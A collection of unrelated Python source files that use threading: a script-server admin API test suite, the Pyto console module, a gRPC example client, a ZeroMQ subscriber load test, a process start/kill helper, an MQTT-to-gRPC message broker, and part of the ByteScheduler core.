headers={'X-Requested-With': 'XMLHttpRequest'},
)
self.assertEqual(start_response.status_code, 200)
self.assertEqual(start_response.content, b'3')
def test_get_script_code(self):
self.start_server(12345, '127.0.0.1')
script_path = test_utils.create_file('my_script.py')
test_utils.write_script_config({'name': 's1', 'script_path': script_path}, 's1', self.runners_folder)
response = self.request('get',
'http://127.0.0.1:12345/admin/scripts/s1/code',
self._admin_session
)
self.assertEqual({'code': 'test text', 'file_path': os.path.abspath(script_path)},
response)
def test_create_script_config(self):
self.start_server(12345, '127.0.0.1')
xsrf_token = self.get_xsrf_token(self._admin_session)
response = self._admin_session.post(
'http://127.0.0.1:12345/admin/scripts',
data={'filename': 'whatever', 'config': json.dumps({
'name': 'test conf',
'script': {
'mode': 'upload_script',
'path': 'whatever'
}
})},
files={'uploadedScript': ('my.py', b'script content')},
headers={'X-XSRFToken': xsrf_token},
)
self.assertEqual(200, response.status_code)
expected_script_path = os.path.join(test_utils.temp_folder, 'conf', 'scripts', 'my.py')
conf_response = self.request('get', 'http://127.0.0.1:12345/admin/scripts/test%20conf',
self._admin_session)
self.assertEqual({'config': {'name': 'test conf',
'script_path': expected_script_path},
'filename': 'test_conf.json'},
conf_response)
script_content = file_utils.read_file(expected_script_path)
self.assertEqual('script content', script_content)
def test_update_script_config(self):
self.start_server(12345, '127.0.0.1')
xsrf_token = self.get_xsrf_token(self._admin_session)
script_path = test_utils.create_file('my_script.py')
test_utils.write_script_config({'name': 's1', 'script_path': script_path}, 's1', self.runners_folder)
response = self._admin_session.put(
'http://127.0.0.1:12345/admin/scripts',
data={'filename': 's1.json', 'config': json.dumps({
'name': 'new name',
'script': {
'mode': 'new_code',
'path': script_path,
'code': 'abcdef'
}
})},
headers={'X-XSRFToken': xsrf_token},
)
self.assertEqual(200, response.status_code)
conf_response = self.request('get', 'http://127.0.0.1:12345/admin/scripts/new%20name',
self._admin_session)
self.assertEqual({'config': {'name': 'new name',
'script_path': script_path},
'filename': 's1.json'},
conf_response)
script_content = file_utils.read_file(script_path)
self.assertEqual('abcdef', script_content)
@staticmethod
def get_xsrf_token(session):
response = session.get('http://127.0.0.1:12345/admin/scripts')
return response.cookies.get('_xsrf')
def request(self, method, url, session=None):
if session is None:
session = self._user_session
response = session.request(method, url)
self.assertEqual(200, response.status_code, 'Failed to execute request: ' + response.text)
return response.json()
def check_server_running(self):
response = self._user_session.get('http://127.0.0.1:12345/conf')
self.assertEqual(response.status_code, 200)
def start_server(self, port, address, *, xsrf_protection=XSRF_PROTECTION_TOKEN):
file_download_feature = FileDownloadFeature(UserFileStorage(b'some_secret'), test_utils.temp_folder)
config = ServerConfig()
config.port = port
config.address = address
config.xsrf_protection = xsrf_protection
config.max_request_size_mb = 1
authorizer = Authorizer(ANY_USER, ['admin_user'], [], ['admin_user'], EmptyGroupProvider())
execution_service = MagicMock()
execution_service.start_script.return_value = 3
cookie_secret = b'cookie_secret'
server.init(config,
MockAuthenticator(),
authorizer,
execution_service,
MagicMock(),
MagicMock(),
ConfigService(authorizer, self.conf_folder),
MagicMock(),
FileUploadFeature(UserFileStorage(cookie_secret), test_utils.temp_folder),
file_download_feature,
'cookie_secret',
None,
self.conf_folder,
start_server=False)
self.start_loop()
self._user_session = requests.Session()
self._user_session.cookies['username'] = create_signed_value(cookie_secret, 'username', 'normal_user') \
.decode('utf8')
self._admin_session = requests.Session()
self._admin_session.cookies['username'] = create_signed_value(cookie_secret, 'username', 'admin_user') \
.decode('utf8')
def start_loop(self):
io_loop = IOLoop.current()
self.ioloop_thread = threading.Thread(target=io_loop.start)
self.ioloop_thread.start()
def setUp(self) -> None:
super().setUp()
test_utils.setup()
self.requires_explicit_ioloop_factory = os_utils.is_win() and env_utils.is_min_version('3.8')
self.windows = os_utils.is_win()
self.conf_folder = test_utils.create_dir(os.path.join('conf'))
self.runners_folder = os.path.join(self.conf_folder, 'runners')
def tearDown(self) -> None:
super().tearDown()
io_loop = IOLoop.current()
try:
server._http_server.stop()
except KeyError:
for socket in server._http_server._sockets.values():
socket.close()
server._http_server._sockets.clear()
self.kill_ioloop(io_loop)
test_utils.cleanup()
def kill_ioloop(self, io_loop):
if not io_loop or not io_loop.asyncio_loop.is_running():
return
io_loop.add_callback(io_loop.stop)
self.ioloop_thread.join(timeout=50)
io_loop.close()
set_event_loop_policy(None)
|
console.py | # -*- coding: utf-8 -*-
"""
This module gives access to the console.
"""
if __host__ is not widget:
from rubicon.objc import *
from _get_variables_hierarchy import get_variables_hierarchy
from code import interact
import stopit
import pdb
if __platform__ is iOS:
import _codecompletion
from pyto import *
from pyto import __isMainApp__
if __host__ is not widget:
import builtins
import importlib.util
import os
import sys
import traceback
import threading
import time
# MARK: REPL
__repl_code__ = {}
__continue_code_completion__ = True
__isREPLAskingForInput__ = False
def __repl_raw_input__(prompt=None):
current_thread = threading.current_thread()
ConsoleViewController.visible.suggestions = []
ConsoleViewController.visible.completions = []
ConsoleViewController.visible.reloadSuggestions()
__isREPLAskingForInput__ = True
Python.shared.isREPLAskingForInput = True
def code_completion():
prompt_ = ""
while True:
def continue_():
return (not threading.current_thread() in ignoredThreads and not current_thread in ignoredThreads)
if not continue_():
break
if __platform__ is iOS and __host__ is not widget and prompt_ != str(ConsoleViewController.visible.prompt):
prompt_ = str(ConsoleViewController.visible.prompt)
code = ";\n"+__repl_code__[current_thread]+"\n"+prompt_+";"
suggestions = []
completions = []
for key, value in _codecompletion.suggestionsForCode(code).items():
suggestions.append(key)
completions.append(value)
if continue_():
ConsoleViewController.visible.completions = completions
ConsoleViewController.visible.suggestions = suggestions
else:
break
else:
continue
if not current_thread in __repl_code__:
__repl_code__[current_thread] = "\n"
code_completion_thread = None
if __platform__ is iOS and ConsoleViewController.visible != None:
code_completion_thread = threading.Thread(target=code_completion, args=())
code_completion_thread.start()
result = ""
exc = None
try:
result = input(prompt)
except Exception as e:
exc = e
__isREPLAskingForInput__ = False
Python.shared.isREPLAskingForInput = False
if __platform__ is iOS and ConsoleViewController.visible != None:
ConsoleViewController.visible.suggestions = []
ConsoleViewController.visible.completions = []
ConsoleViewController.visible.reloadSuggestions
if exc != None:
raise exc
if __platform__ is iOS and ConsoleViewController.visible != None:
ignoredThreads.append(code_completion_thread)
__repl_code__[current_thread] += "\n"+result
return result
def __runREPL__():
if __host__ is widget:
return
os.system = Python.shared.system
sys.argv = ['']
Python.shared.isScriptRunning = True
interact(readfunc=__repl_raw_input__)
# MARK: - Running
__script__ = None
__is_loop_running__ = False
__inspector_thread__ = None
__i__ = 0
__breakpoints__ = []
__are_breakpoints_set__ = True
__should_inspect__ = False
def run_script(path, replMode=False, debug=False, breakpoints=[]):
"""
Run the script at given path catching exceptions.
This function should only be used internally by Pyto.
Args:
path: The path of the script.
replMode: If set to `True`, errors will not be handled.
debug: Set to `True` for debugging.
breakpoints: Lines to break if debugging.
"""
if __platform__ is iOS:
python = Python.shared
sys.argv = [path]
for arg in python.args:
if arg != "":
sys.argv.append(str(arg))
def run() -> None:
if __platform__ is iOS:
Python.shared.isScriptRunning = True
os.system = Python.shared.system
directory = os.path.expanduser(os.path.dirname(path))
os.chdir(directory)
sys.path.insert(0, directory)
try:
global __script__
spec = importlib.util.spec_from_file_location("__main__", path)
__script__ = importlib.util.module_from_spec(spec)
if debug and __platform__ is iOS and __host__ is not widget:
try:
console
except:
import console
console.__are_breakpoints_set__ = False
console.__should_inspect__ = True
console.__breakpoints__ = breakpoints
console.__i__ = -1
old_input = input
def debugger_input(prompt):
try:
console
except:
import console
if not console.__are_breakpoints_set__:
breakpoints = console.__breakpoints__
console.__i__ += 1
if len(breakpoints) < console.__i__:
console.__are_breakpoints_set__ = True
return ""
try:
breakpoints[console.__i__+1]
except:
console.__are_breakpoints_set__ = True
return "b "+str(breakpoints[console.__i__])
elif not console.__should_inspect__:
console.__should_inspect__ = True
return old_input(prompt)
else:
console.__should_inspect__ = False
return "from pyto import ConsoleViewController; from _get_variables_hierarchy import get_variables_hierarchy; ConsoleViewController.variables = get_variables_hierarchy(locals())"
if len(breakpoints) > 0:
builtins.input = debugger_input
pdb.main(["pdb", path])
builtins.input = old_input
else:
spec.loader.exec_module(__script__)
except SystemExit:
pass
except KeyboardInterrupt:
pass
except Exception as e:
if __platform__ is iOS and not __isMainApp__() or replMode:
print(traceback.format_exc())
if not replMode:
Python.shared.fatalError(str(e))
else:
exc_type, exc_obj, exc_tb = sys.exc_info()
extracts = traceback.extract_tb(sys.exc_info()[2])
count = len(extracts)
lineNumber = -1
fileName = path
for i, extract in enumerate(extracts):
if extract[0] == fileName:
lineNumber = extract[1]
break
count -= 1
if (type(e) == SyntaxError): # The last word in a `SyntaxError` exception is the line number
lineNumber = [int(s) for s in (str(e)[:-1]).split() if s.isdigit()][-1]
if __platform__ is iOS:
Python.shared.errorType = exc_type.__name__
Python.shared.errorReason = str(e)
EditorSplitViewController.visible.editor.showErrorAtLine(lineNumber)
elif __platform__ is macOS:
print("Pyto.error_at_line;"+str(lineNumber)+";")
error = traceback.format_exc(limit=-count)
if __platform__ is iOS:
PyOutputHelper.printError(error)
sys.path.remove(directory)
else:
sys.stderr.write(error+"\n")
if debug:
pdb.post_mortem(exc_tb)
if __platform__ is iOS and __isMainApp__():
EditorViewController.runningLine = 0
ReviewHelper.shared.launches = ReviewHelper.shared.launches+1
ReviewHelper.shared.requestReview()
thread = threading.Thread(target=run, args=())
def inspector_loop():
time.sleep(1)
while thread.isAlive():
if __platform__ is iOS and not ConsoleViewController.isMainLoopRunning:
try:
vars = get_variables_hierarchy(__script__)
if vars != ConsoleViewController.variables:
ConsoleViewController.variables = vars
except:
pass
time.sleep(1)
def interruption_loop():
while thread.isAlive():
sys.__stdout__.write(str(Python.shared._isScriptRunning)+"\n")
if not Python.shared._isScriptRunning or Python.shared._interrupt:
target_tid = 0
for tid, tobj in threading._active.items():
if tobj is thread:
found = True
target_tid = tid
break
if Python.shared._interrupt:
stopit.async_raise(target_tid, KeyboardInterrupt)
elif not Python.shared._isScriptRunning:
stopit.async_raise(target_tid, SystemExit)
Python.shared._interrupt = False
if thread.isAlive:
Python.shared._isScriptRunning = True
time.sleep(1)
if __platform__ is iOS:
Python.shared.isScriptRunning = True
Python.shared._isScriptRunning = True
if __host__ is not widget and __platform__ is iOS and not debug:
inspector_thread = threading.Thread(target=inspector_loop, args=())
inspector_thread.start()
#interruption_thread = threading.Thread(target=interruption_loop, args=())
#interruption_thread.start()
if __platform__ is iOS:
thread.start()
else:
run()
if __host__ is not widget and __platform__ is iOS:
interruption_loop()
if __platform__ is iOS:
sys.__stdout__.write("Execution finished\n")
try:
vars = get_variables_hierarchy(__script__)
if __platform__ is iOS:
if vars != ConsoleViewController.variables:
ConsoleViewController.variables = vars
elif __platform__ is macOS:
# TODO: Mac support
pass
except:
pass
if __platform__ is iOS:
Python.shared._isScriptRunning = False
Python.shared.isScriptRunning = False
return __script__
# MARK: - I/O
ignoredThreads = []
"""
All output and input request from these threads will be ignored.
"""
def __console__():
if __platform__ is iOS:
return ConsoleViewController.visible
else:
return
def clear():
"""
Clears the console.
"""
if threading.current_thread() in ignoredThreads:
return
if __platform__ is macOS:
print("Pyto.console.clear")
else:
__console__().clear()
time.sleep(0.1)
if __platform__ is iOS:
__PyInputHelper__ = PyInputHelper
def input(prompt=""):
"""
Requests input with given prompt.
Args:
prompt: Text printed before the user's input without a newline.
"""
if __host__ is widget:
return None
NSBundle = ObjCClass("NSBundle")
if NSBundle.mainBundle.bundlePath.pathExtension == "appex":
return None
if __platform__ is iOS:
if not __isREPLAskingForInput__ and ConsoleViewController.visible != None:
ConsoleViewController.visible.suggestions = []
ConsoleViewController.visible.completions = []
__PyInputHelper__.userInput = None
__PyInputHelper__.showAlertWithPrompt(prompt)
while __PyInputHelper__.userInput == None or threading.currentThread() in ignoredThreads:
continue
userInput = __PyInputHelper__.userInput
__PyInputHelper__.userInput = None
return str(userInput)
if __platform__ is iOS:
__PyOutputHelper__ = PyOutputHelper
def print(*objects, sep=None, end=None):
"""
Prints to the Pyto console, not to the stdout. Works as the builtin `print` function but does not support printing to a custom file. Pyto catches by default the stdout and the stderr, so use the builtin function instead. This function is mainly for internal use.
"""
if sep is None:
sep = ' '
if end is None:
end = '\n'
array = map(str, objects)
__PyOutputHelper__.print(sep.join(array)+end)
# MARK: - Alerts
if __host__ is not widget:
if __platform__ is iOS:
PyAlert = PyAlert
"""
A class representing an alert.
Example:
alert = console.Alert.alertWithTitle("Hello", message="Hello World!")
alert.addAction("Ok")
alert.addCancelAction("Cancel")
if (alert.show() == "Ok"):
print("Good Bye!")
"""
class Alert:
"""
A wrapper of `PyAlert` Objective-C class on iOS and `NSAlert` on macOS that represents an UI alert.
"""
if __platform__ is iOS:
pyAlert = None
"""
The Objective-C representation.
"""
elif __platform__ is macOS:
nsAlert = None
"""
The Objective-C representation.
"""
def __init__(self):
if __platform__ is iOS:
self.pyAlert = PyAlert.alloc().init()
elif __platform__ is macOS:
from ctypes import cdll
cdll.LoadLibrary("/System/Library/Frameworks/Cocoa.framework/Versions/Current/Cocoa")
self.nsAlert = ObjCClass("NSAlert").alloc().init()
@staticmethod
def alertWithTitle(title, message):
"""
Creates an alert.
Args:
title: The title of the alert.
message: The message of the alert.
"""
alert = Alert()
if __platform__ is iOS:
alert.pyAlert.title = title
alert.pyAlert.message = message
elif __platform__ is macOS:
alert.nsAlert.informativeText = title
alert.nsAlert.messageText = message
return alert
__actions__ = []
def addAction(self, title):
"""
Add an action with given title.
Args:
title: The title of the action.
"""
if __platform__ is iOS:
self.pyAlert.addAction(title)
else:
self.nsAlert.addButtonWithTitle(title)
self.__actions__.append(title)
def addDestructiveAction(self, title):
"""
Add a destructive action with given title.
Args:
title: The title of the action.
"""
if __platform__ is macOS:
raise NotImplementedError("`addDestructiveAction` cannot be used on macOS. Use `addAction`.")
self.pyAlert.addDestructiveAction(title)
def addCancelAction(self, title):
"""
Add a cancel action with given title. Can only added once.
Args:
title: The title of the action.
"""
if __platform__ is macOS:
raise NotImplementedError("`addCancelAction` cannot be used on macOS. Use `addAction`.")
if not self.pyAlert.addCancelAction(title):
raise ValueError("There is already a cancel action.")
def show(self):
"""
Shows alert.
Returns the title of the selected action.
"""
if __platform__ is iOS:
return self.pyAlert._show()
elif __platform__ is macOS:
return self.__actions__[self.nsAlert.runModal()-1000]
else:
PyAlert = None
Alert = None
|
_client_application.py | # Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An example gRPC Python-using client-side application."""
import collections
import enum
import threading
import time
import grpc
from tests.unit.framework.common import test_constants
from tests.testing.proto import requests_pb2
from tests.testing.proto import services_pb2
from tests.testing.proto import services_pb2_grpc
from tests.testing import _application_common
@enum.unique
class Scenario(enum.Enum):
UNARY_UNARY = 'unary unary'
UNARY_STREAM = 'unary stream'
STREAM_UNARY = 'stream unary'
STREAM_STREAM = 'stream stream'
CONCURRENT_STREAM_UNARY = 'concurrent stream unary'
CONCURRENT_STREAM_STREAM = 'concurrent stream stream'
CANCEL_UNARY_UNARY = 'cancel unary unary'
CANCEL_UNARY_STREAM = 'cancel unary stream'
INFINITE_REQUEST_STREAM = 'infinite request stream'
class Outcome(collections.namedtuple('Outcome', ('kind', 'code', 'details'))):
"""Outcome of a client application scenario.
Attributes:
kind: A Kind value describing the overall kind of scenario execution.
code: A grpc.StatusCode value. Only valid if kind is Kind.RPC_ERROR.
details: A status details string. Only valid if kind is Kind.RPC_ERROR.
"""
@enum.unique
class Kind(enum.Enum):
SATISFACTORY = 'satisfactory'
UNSATISFACTORY = 'unsatisfactory'
RPC_ERROR = 'rpc error'
_SATISFACTORY_OUTCOME = Outcome(Outcome.Kind.SATISFACTORY, None, None)
_UNSATISFACTORY_OUTCOME = Outcome(Outcome.Kind.UNSATISFACTORY, None, None)
class _Pipe(object):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._open = True
def __iter__(self):
return self
def _next(self):
with self._condition:
while True:
if self._values:
return self._values.pop(0)
elif not self._open:
raise StopIteration()
else:
self._condition.wait()
def __next__(self): # (Python 3 Iterator Protocol)
return self._next()
def next(self): # (Python 2 Iterator Protocol)
return self._next()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def close(self):
with self._condition:
self._open = False
self._condition.notify_all()
def _run_unary_unary(stub):
response = stub.UnUn(_application_common.UNARY_UNARY_REQUEST)
if _application_common.UNARY_UNARY_RESPONSE == response:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_unary_stream(stub):
response_iterator = stub.UnStre(_application_common.UNARY_STREAM_REQUEST)
try:
next(response_iterator)
except StopIteration:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_stream_unary(stub):
response, call = stub.StreUn.with_call(
iter((_application_common.STREAM_UNARY_REQUEST,) * 3))
if (_application_common.STREAM_UNARY_RESPONSE == response and
call.code() is grpc.StatusCode.OK):
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_stream_stream(stub):
request_pipe = _Pipe()
response_iterator = stub.StreStre(iter(request_pipe))
request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
first_responses = next(response_iterator), next(response_iterator),
request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
second_responses = next(response_iterator), next(response_iterator),
request_pipe.close()
try:
next(response_iterator)
except StopIteration:
unexpected_extra_response = False
else:
unexpected_extra_response = True
if (first_responses == _application_common.TWO_STREAM_STREAM_RESPONSES and
second_responses == _application_common.TWO_STREAM_STREAM_RESPONSES
and not unexpected_extra_response):
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_concurrent_stream_unary(stub):
future_calls = tuple(
stub.StreUn.future(
iter((_application_common.STREAM_UNARY_REQUEST,) * 3))
for _ in range(test_constants.THREAD_CONCURRENCY))
for future_call in future_calls:
if future_call.code() is grpc.StatusCode.OK:
response = future_call.result()
if _application_common.STREAM_UNARY_RESPONSE != response:
return _UNSATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
else:
return _SATISFACTORY_OUTCOME
def _run_concurrent_stream_stream(stub):
condition = threading.Condition()
outcomes = [None] * test_constants.RPC_CONCURRENCY
def run_stream_stream(index):
outcome = _run_stream_stream(stub)
with condition:
outcomes[index] = outcome
condition.notify()
for index in range(test_constants.RPC_CONCURRENCY):
thread = threading.Thread(target=run_stream_stream, args=(index,))
thread.start()
with condition:
while True:
if all(outcomes):
for outcome in outcomes:
if outcome.kind is not Outcome.Kind.SATISFACTORY:
return _UNSATISFACTORY_OUTCOME
else:
return _SATISFACTORY_OUTCOME
else:
condition.wait()
def _run_cancel_unary_unary(stub):
response_future_call = stub.UnUn.future(
_application_common.UNARY_UNARY_REQUEST)
initial_metadata = response_future_call.initial_metadata()
cancelled = response_future_call.cancel()
if initial_metadata is not None and cancelled:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_infinite_request_stream(stub):
def infinite_request_iterator():
while True:
yield _application_common.STREAM_UNARY_REQUEST
response_future_call = stub.StreUn.future(
infinite_request_iterator(),
timeout=_application_common.INFINITE_REQUEST_STREAM_TIMEOUT)
if response_future_call.code() is grpc.StatusCode.DEADLINE_EXCEEDED:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def run(scenario, channel):
stub = services_pb2_grpc.FirstServiceStub(channel)
try:
if scenario is Scenario.UNARY_UNARY:
return _run_unary_unary(stub)
elif scenario is Scenario.UNARY_STREAM:
return _run_unary_stream(stub)
elif scenario is Scenario.STREAM_UNARY:
return _run_stream_unary(stub)
elif scenario is Scenario.STREAM_STREAM:
return _run_stream_stream(stub)
elif scenario is Scenario.CONCURRENT_STREAM_UNARY:
return _run_concurrent_stream_unary(stub)
elif scenario is Scenario.CONCURRENT_STREAM_STREAM:
return _run_concurrent_stream_stream(stub)
elif scenario is Scenario.CANCEL_UNARY_UNARY:
return _run_cancel_unary_unary(stub)
elif scenario is Scenario.INFINITE_REQUEST_STREAM:
return _run_infinite_request_stream(stub)
except grpc.RpcError as rpc_error:
return Outcome(Outcome.Kind.RPC_ERROR,
rpc_error.code(), rpc_error.details())
_IMPLEMENTATIONS = {
Scenario.UNARY_UNARY: _run_unary_unary,
Scenario.UNARY_STREAM: _run_unary_stream,
Scenario.STREAM_UNARY: _run_stream_unary,
Scenario.STREAM_STREAM: _run_stream_stream,
Scenario.CONCURRENT_STREAM_UNARY: _run_concurrent_stream_unary,
Scenario.CONCURRENT_STREAM_STREAM: _run_concurrent_stream_stream,
Scenario.CANCEL_UNARY_UNARY: _run_cancel_unary_unary,
Scenario.INFINITE_REQUEST_STREAM: _run_infinite_request_stream,
}
def run(scenario, channel):
stub = services_pb2_grpc.FirstServiceStub(channel)
try:
return _IMPLEMENTATIONS[scenario](stub)
except grpc.RpcError as rpc_error:
return Outcome(Outcome.Kind.RPC_ERROR,
rpc_error.code(), rpc_error.details())
|
test.py | import time
import zmq
import threading
import sys
groupname = "test"
latestNumber = None
received = 0
subscribers = 0
firstReceived = 0
numberOfSubscribers = 1024
def recv():
global latestNumber, received, firstReceived
ctx = zmq.Context()
socket = ctx.socket(zmq.SUB)
socket.setsockopt(zmq.SUBSCRIBE, groupname.encode("ascii"))
# https://github.com/zeromq/libzmq/issues/2882
socket.setsockopt(zmq.TCP_KEEPALIVE, 1)
socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, 10)
socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 1)
socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, 1)
socket.connect("tcp://34.73.146.178:5556")
while True:
time.sleep(0.1)
topic, msg = socket.recv_multipart()
number = msg.decode()
if latestNumber != number:
firstReceived = time.time()
received = 1
latestNumber = number
print("Reset")
else:
received += 1
def observe():
global latestNumber, received, firstReceived
while True:
print(received * 100 / numberOfSubscribers, "%")
time.sleep(1)
for i in range(numberOfSubscribers):
t = threading.Thread(target=recv)
t.start()
subscribers += 1
t = threading.Thread(target=observe)
t.start()
print(f"Created {subscribers} subscribers")
|
tx_test.py | from multiprocessing import Process
import time, os, threading
def start_tx(name):
os.system('python3 {name}'.format(name=name))
def kill_tx(name):
temp_filename = 'tmp_pid'
os.system('ps -ef | grep {name} > {temp_filename}'.format(name=name,temp_filename=temp_filename))
with open(temp_filename, 'r') as tmp:
lines = tmp.readlines()
for line in lines:
compoments = line.split()
curr_name = compoments[-1]
curr_command = compoments[-2]
if curr_name == name and curr_command == 'python3':
pid = compoments[1]
os.system('kill -9 {pid}'.format(pid=pid))
os.system('rm -f {temp_filename}'.format(temp_filename=temp_filename))
if __name__ == '__main__':
name = 'sdr_code.py'
threading.Thread(target=start_tx, args=(name,)).start()
time.sleep(3)
kill_tx(name)
|
message-broker.py | import datetime
import json
import os
import sys
import paho.mqtt.client as mqtt
import multiprocessing
import grpc
import fxgateway_pb2
import fxgateway_pb2_grpc
if sys.version_info >= (3, 0):
from http.server import BaseHTTPRequestHandler, HTTPServer
else:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
# register topic + gateway address
topic_name = "gRPC"
gateway = "[GW_SERVER_ADDRESS]" # "10.0.0.183:31113"
gateway_ip = "[GW_SERVER_IP]" # "10.0.0.183"
gateway_port = "[GW_PORT_NUMBER]" # "31113"
if len(sys.argv) < 2:
print("Input Command : python message-broker.py [SERVERLESS_FUNCTION_NAME]")
sys.exit()
class MyHandler(BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes("<html><head><title>GET response</title></head>\n", "utf-8"))
s.wfile.write(bytes("</body></html>\n", "utf-8"))
def do_POST(s):
content_length = int(s.headers['Content-Length'])
post_data = s.rfile.read(content_length)
print("===========HTTP===========")
print(s.headers)
print(post_data.decode())
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def HTTP_Receiver():
httpd = HTTPServer((gateway_ip, []), MyHandler)
try:
print ("HTTP Server Start - " + gateway_ip + " : " + gateway_port)
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
def MQTT_Receiver():
client = mqtt.Client()
client.connect(gateway_ip)
# register subscribe
def on_connect(client, userdata, flags, rc):
print("Using gateway {} and topic {}".format(gateway, topic_name))
client.subscribe(topic_name)
# process received Messaage from openfx gateway
def on_message(client, userdata, msg):
# gRPC
channel = grpc.insecure_channel(gateway)
stub = fxgateway_pb2_grpc.FxGatewayStub(channel)
servicerequest = fxgateway_pb2.InvokeServiceRequest(Service=sys.argv[1], Input=str(msg.payload.decode("utf-8")))
r = stub.Invoke(servicerequest)
print(r.Msg)
client.on_connect = on_connect
client.on_message = on_message
client.loop_forever()
if __name__ == '__main__':
process_mqtt_receiver = multiprocessing.Process(target=MQTT_Receiver)
process_mqtt_receiver.daemon = True
process_mqtt_receiver.start()
process_http_receiver = multiprocessing.Process(target=HTTP_Receiver)
process_http_receiver.daemon = True
process_http_receiver.start()
process_http_receiver.join()
process_mqtt_receiver.join() |
bytecore.py | #!/usr/bin/python
from __future__ import absolute_import
import sys
try:
import queue
except ImportError:
import Queue as queue
import threading
import logging
import collections
from .bytetask import ByteTask
from .tuner import Tuner
from .profiler import Profiler
import os
class ByteCore(object):
"""The core of ByteScheduler. Once Core gets a ByteTask (which represents a communication operation, e.g., push,
allreduce), it partitions the ByteTask and decides when to send each partition according to priority."""
def __init__(self, logger=None):
"""
Args:
logger: ByteScheduler logger object
"""
if logger is None:
self._logger = logging.getLogger("ByteScheduler")
else:
self._logger = logger
# A priority queue of ByteTask, tasks are sorted according to its priority.
self._queue = queue.PriorityQueue()
# Scheduler thread
self._scheduler = threading.Thread(target=self._loop, args=())
self._scheduler.daemon = True
self._is_started = False
# DATA represents normal tasks and EXIT signals the scheduler thread to be terminated.
self._commands = {'DATA': 0, 'EXIT': 1}
# Control credit
self._condition = threading.Condition(threading.Lock())
# Pending tasks that are not ready
self._pending = set()
self._pending_lock = threading.Lock()
# Only used to avoid task being garbage collected before completion.
self._running = set()
self._finished = collections.OrderedDict()
# The rank of a worker
self._rank = None
# The communication architecture used, e.g., ps or allreduce.
self._arch = None
# Partition unit, i.e., the number of parameters
self._partition = int(os.environ.get('BYTESCHEDULER_PARTITION', 1000000))
# Credit, i.e., the max number of unacknowledged parameters
self._credit = float(os.environ.get('BYTESCHEDULER_CREDIT', 4000000))
self._credit_limit = self._credit
# We expect that the first key is same across iterations and we use it to count how many training steps have
# been run.
self._first_key = None
self._step = 0
# Tuning
self._credit_tuning = int(os.environ.get('BYTESCHEDULER_CREDIT_TUNING', 1))
self._partition_tuning = int(os.environ.get('BYTESCHEDULER_PARTITION_TUNING', 0))
self._tuner = None
# hyper parameters of auto-tuning.
self._current_point = {
"credit": self._credit,
"partition": self._partition,
}
self._next_point = None
# profiling
self._timeline = os.environ.get('BYTESCHEDULER_TIMELINE', '')
self._profiler = None
def start(self, rank, arch):
"""Start core.
Args:
rank: the rank of the worker
arch: the communication architecture, "ps" or "allreduce"
"""
if self._is_started:
self._logger.warning("Core is already started.")
return
self._rank = rank
# Setup profiler
if self._rank == 0 and self._timeline:
self._logger.info("rank {}: profiler is enabled.".format(self._rank))
self._profiler = Profiler(self._timeline)
else:
self._profiler = Profiler('')
assert arch == "ps" or arch == "allreduce", arch + " not supported!"
self._arch = arch
# Support tuning partition for allreduce
if self._partition_tuning:
assert arch == "allreduce", "Do not support partition tuning for ps."
self._current_point["partition"] = self._partition
if (rank == 0 and self._credit_tuning) or self._partition_tuning:
self._tuner = Tuner(rank=self._rank, arch=arch, credit_tuning=self._credit_tuning,
partition_tuning=self._partition_tuning, logger=self._logger)
self._scheduler.start()
self._is_started = True
self._logger.info(
"start Core {}: credit {}, partition {}, credit tuning {}, partition tuning {}.".format(
self._rank, self._credit, self._partition, self._credit_tuning, self._partition_tuning))
def shutdown(self, wait_for_all=False):
"""Shut Core down.
Args:
wait_for_all: Flag indicating whether to wait completion of undone tasks.
"""
if not self._is_started:
self._logger.warning("Core is already shutdown.")
return
if wait_for_all:
self._queue.put((sys.maxint, self._commands['EXIT'], None))
else:
self._queue.put((-sys.maxint, self._commands['EXIT'], None))
with self._condition:
self._credit = sys.maxint
self._condition.notify_all()
self._scheduler.join()
self._is_started = False
self._tuner.exit()
self._profiler.stop()
self._logger.info("shutdown Core {}.".format(self._rank))
def post(self, task):
"""Post a communication task to Core for scheduling.
Args:
task: a ByteTask object
Returns:
A boolean value indicating whether the task is successfully posted
"""
if not self._is_started:
self._logger.error("Core is not running, call start first!")
return False
if not isinstance(task, ByteTask):
self._logger.error(
"{} is not an instance of ByteTask!".format(task.desc))
return False
else:
# Set the first key and use it to count number of training steps.
if not self._first_key:
self._first_key = task.name
if self._first_key == task.name:
self._step += 1
if self._tuner:
self._tune()
# Partition a task if its tensor is larger than a threshold.
if task.tensor_size() > self._partition:
subtasks = task.partition(size=self._partition)
else:
subtasks = [task]
# A task will bypass scheduling and start immediately after partition if immediate is True.
if task.is_immediate():
# The callback runs after an immediate task is finished.
def _end_callback(t, self):
with self._condition:
self._running.remove(t)
self._finished[t.name] = t
self._profiler.put(t.name, t.op + 'COMMUNICATION', 'E')
for t in subtasks:
with self._condition:
self._running.add(t)
